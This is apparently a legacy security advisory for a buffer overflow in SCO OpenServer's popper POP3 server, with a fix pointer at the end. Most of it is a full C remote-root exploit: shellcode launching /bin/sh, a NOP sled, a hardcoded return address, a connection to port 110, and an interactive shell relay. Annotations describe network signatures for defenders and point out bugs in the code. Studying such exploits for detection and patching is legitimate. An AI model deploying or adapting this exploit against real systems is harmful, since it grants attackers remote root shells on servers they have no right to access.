COMMAND
popper
SYSTEMS AFFECTED
SCO OpenServer 5.0.0 through 5.0.4, SCO Internet FastStart 1.0.0 and 1.1.0
PROBLEM
A buffer overflow vulnerability that has been identified in QUALCOMM's
qpopper also seems to be present in servers based on that code,
such as SCO's.
Vit Andrusevich made an exploit which will give you root remotely.
Offset 0 is for version 2.1.4-R3. The ASM string was slightly modified
for the SCO syscall style. Tested on SCO OpenServer 5.0.4.
/*
* Remote pop exploit for SCO systems.
* by glitch of litecrew.
* Ripped from Miroslaw Grzybek's code.
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/errno.h>
/* Payload string that main() copies into the request buffer at offset
 * 800. The bytes are opaque machine code; the only readable content is
 * the literal "/bin/sh". It contains no 0x00 byte, so the strlen()
 * used to copy it in main() covers the whole string.
 * Detection note: together with the 0x90 fill applied in main() this is
 * a fixed byte pattern, which is what a network or host signature for
 * this attack can match on. */
char *shell=
"\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17"
"\x88\x5e\x1c\x8d\x16\x89\x56\x0e\x31\xc0\xb0\x3b\x8d\x7e"
"\x12\x89\xf9\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89"
"\xcf\xeb\x01\xff\x63\x61\x62\x62\xeb\x1b\xe8\xc9\xff\xff"
"\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb"
"\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa";
/* Value written repeatedly into buf from offset 901 onward (plus the
 * user-supplied offset); the advisory text states it is tied to the
 * SCOPOP 2.1.4-R3 build. */
#define ADDR 0x80474b4
#define OFFSET 0
/* Size of the request buffer. A single POP3 command line this long is
 * far outside normal client behaviour and is itself an indicator. */
#define BUFLEN 1200
char buf[BUFLEN];       /* request buffer; later reused for relayed data */
int offset=OFFSET;      /* optional argv[2] adjustment added to ADDR */
int nbytes;             /* byte count returned by the last read() from sock */
int sock;               /* TCP connection to the target's port 110 */
struct sockaddr_in sa;  /* target address, filled in by main() */
struct hostent *hp;     /* gethostbyname() result for argv[1] */
short a;                /* scratch value used when filtering received bytes */
/*
 * Entry point: connect to TCP port 110 on the host named in argv[1],
 * send the prepared buffer as one line, then relay data between the
 * socket and the terminal until select() fails.
 *
 * argv[1]  host name or IP address to connect to (required)
 * argv[2]  optional decimal offset added to ADDR (default OFFSET)
 *
 * Note for defenders: on the wire this is a single POP3 "command" of
 * about BUFLEN bytes, almost all of them 0x90, sent immediately after
 * connecting (no USER/PASS exchange) and followed by an interactive
 * session on the same connection. The remedy is the fixed popper
 * binary named in the SOLUTION section of this advisory.
 *
 * `void main` is non-standard C (the standard return type is int), and
 * memset/memcpy/strlen are used without <string.h>, i.e. implicitly
 * declared.
 */
void main (int argc, char *argv[]) {
int i;
if(argc<2) {
printf("Usage: %s <IP | HOSTNAME> [offset]\n",argv[0]);
printf("Default offset is 0. It works against SCOPOP v2.1.4-R3\n");
exit(0);
}
if(argc>2)
offset=atoi(argv[2]);   /* atoi() reports no errors; bad input yields 0 */
/* Fill the whole buffer with 0x90, place the payload string at offset
 * 800, then overwrite every 4-byte slot from offset 901 onward with
 * ADDR+offset via an (unaligned) int store in host byte order. */
memset(buf,0x90,BUFLEN);
memcpy(buf+800,shell,strlen(shell));
for(i=901;i<BUFLEN-4;i+=4)
*(int *)&buf[i]=ADDR+offset;
/* Index BUFLEN is one past the end of buf: this store lands in whatever
 * the linker placed after the array (undefined behaviour). */
buf[BUFLEN]='\n';
/* Resolve the target and open a TCP connection to POP3 port 110.
 * Every failure path exits with status 0. */
if((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) {
perror("gethostbyname()");   /* gethostbyname() does not set errno, so this text may be misleading */
exit(0);
}
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("socket()");
exit(0);
}
sa.sin_family=AF_INET;
sa.sin_port=htons(110);
memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
perror("connect()");
exit(0);
}
printf("CONNECTED TO %s... SENDING DATA\n",argv[1]);
fflush(stdout);
/* buf has no NUL terminator (the memset fill and the payload contain
 * none), so strlen(buf) scans past the array and the number of bytes
 * sent depends on adjacent memory. */
write(sock,buf,strlen(buf));
/* Relay loop: socket -> stdout with non-printable bytes replaced by
 * spaces (newlines kept), stdin -> socket verbatim. */
while(1) {
fd_set input;   /* never cleared with FD_ZERO(); its other bits are indeterminate */
FD_SET(0,&input);
FD_SET(sock,&input);
if((select(sock+1,&input,NULL,NULL,NULL))<0) {
if(errno==EINTR) continue;
printf("CONNECTION CLOSED...\n");   /* printed for any select() error, not only a closed peer */
fflush(stdout);
exit(1);
}
if(FD_ISSET(sock,&input)) {
nbytes=read(sock,buf,BUFLEN);   /* -1 (error) and 0 (EOF) are not checked */
for(i=0;i<nbytes;i++) {
/* Store one byte into the global short `a` through a char pointer;
 * presumably so bytes >= 0x80 compare as positive (assumes a
 * little-endian layout and that the other byte stays zero from static
 * initialisation) -- confirm on the target platform. */
*(char *)&a=buf[i];
if ((a!=10)&&((a >126) || (a<32)) ){
buf[i]=' ';   /* anything outside printable ASCII except '\n' becomes a space */
}
}
write(1,buf,nbytes);
}
if(FD_ISSET(0,&input))
write(sock,buf,read(0,buf,BUFLEN));   /* a read() error (-1) would be passed as a huge size_t */
}
}
SOLUTION
A fixed binary is now available in the SCO Security Enhancements
directory on ftp.sco.com:
ftp://ftp.sco.com/SSE
The popper fix applies to SCO OpenServer 5.0.0 through 5.0.4, SCO
Internet FastStart 1.0.0 and 1.1.0. The popper in UnixWare 7 and
in UnixWare 2.x-based Internet FastStart is based on completely
different source and doesn't have this set of problems.